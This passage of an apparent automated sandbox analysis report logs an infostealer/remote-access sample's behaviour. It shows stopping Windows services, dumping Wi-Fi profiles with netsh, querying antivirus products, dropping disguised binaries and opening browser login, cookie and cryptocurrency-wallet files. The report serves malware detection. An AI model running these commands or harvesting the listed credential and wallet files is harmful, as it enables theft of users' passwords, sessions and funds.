                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6664, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                                  Source: C:\Recovery\HpQPPZazcv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: Yara matchFile source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6664, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
